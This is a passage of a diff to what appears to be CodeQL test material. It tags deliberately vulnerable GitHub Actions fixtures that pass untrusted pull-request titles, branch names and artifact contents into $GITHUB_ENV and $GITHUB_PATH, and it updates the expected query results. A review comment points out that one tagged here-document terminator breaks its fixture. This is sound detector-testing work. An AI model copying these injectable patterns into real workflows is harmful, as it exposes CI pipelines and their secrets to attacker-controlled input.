@@ -17,7 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - run: | + - run: | # $ Source[actions/envvar-injection/critical] echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV - echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 7b30ec8b7e42..f4c6ebcb5b3c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
@@ -8,43 +8,43 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PR_TITLE<> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV - echo "EOF" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" echo "$TITLE" >> "${GITHUB_ENV}" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | cat <<-EOF >> 
"$GITHUB_ENV" FOO=$TITLE - EOF + EOF # $ Alert[actions/envvar-injection/critical] - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | @@ -52,12 +52,12 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.head_ref }} - - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TARGET_BRANCH: ${{ github.event.pull_request.title }} - - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + TARGET_BRANCH: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] - env: TITLE: |- ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml index cfc5e6ef1fa5..cdcc49bde91f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml 
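Review bot: The tag appended to the here-document terminator in test4.yml, `EOF # $ Alert[actions/envvar-injection/critical]`, sits inside a `run: |` block scalar, so it is script text rather than a YAML comment. A shell here-document ends only on a line that consists of the delimiter alone, so `cat <<-EOF >> "$GITHUB_ENV"` no longer has a terminator and the fixture now holds a different script from the one it was written to exercise. If the tag has to be on the last line of the block, keep `EOF` bare and add a no-op line after it, `: # $ Alert[actions/envvar-injection/critical]`. That adds one line, so later locations for test4.yml in the `.expected` file would need regenerating. The other tagged lines in this hunk end in ordinary commands, where a trailing `#` comment does not change the script.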
@@ -27,10 +27,10 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' + - name: 'Unzip code coverage' # $ Source[actions/envvar-injection/critical] run: unzip oc-code-coverage.zip -d coverage - name: set env vars run: | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml index 36340258515e..076941d4aece 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -8,20 +8,20 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=${TITLE##*/} - echo PR_TITLE=${FOO} >> $GITHUB_ENV + echo PR_TITLE=${FOO} >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=$TITLE+ - echo PR_TITLE=$FOO >> $GITHUB_ENV + echo PR_TITLE=$FOO >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | venv="$(echo $TITLE)')" - echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml index c33c90dbb9c6..f9e0ea8a3245 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -13,7 +13,7 @@ jobs: run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Load .env file + - name: Load .env file # $ Source[actions/envvar-injection/critical] uses: aarcangeli/load-dotenv@v1.0.0 with: path: 'backend/new' @@ -21,5 +21,5 @@ jobs: .env .env.test quiet: false - if-file-not-found: error + if-file-not-found: error # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index 806f8dc8e45c..c84dcae914ca 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -27,13 +27,13 @@ jobs: run_id: ${{ github.event.workflow_run.id }} path: ./artifacts - - name: assignment + - name: assignment # $ Source[actions/envvar-injection/critical] run: | foo=$(cat ./artifacts/parent-artifacts/event.txt) - echo "foo=$foo" >> $GITHUB_ENV + echo "foo=$foo" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 1 run: | - echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 2 run: | - echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml index 3ed80374ef65..6f7d3b9cffcf 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -24,7 +24,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/envvar-injection/critical] id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -38,4 +38,4 @@ jobs: fi echo "pr_num=$pr_num" >> $GITHUB_ENV - echo "ref=$ref" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index f544994fc5c1..398a80131733 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -1,3 +1,9 @@ +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | 
@@ -16,9 +22,3 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref index 80f72124fe45..01345ebb915b 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionCritical.ql +query: Security/CWE-077/EnvPathInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index 5be9f729ad64..d18365265b8f 100644 
--- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -16,4 +17,3 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref index 165a3d20896b..e61216acaa43 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionMedium.ql +query: Security/CWE-077/EnvPathInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9914ae91df12..85035023f666 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,3 +1,40 @@ +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
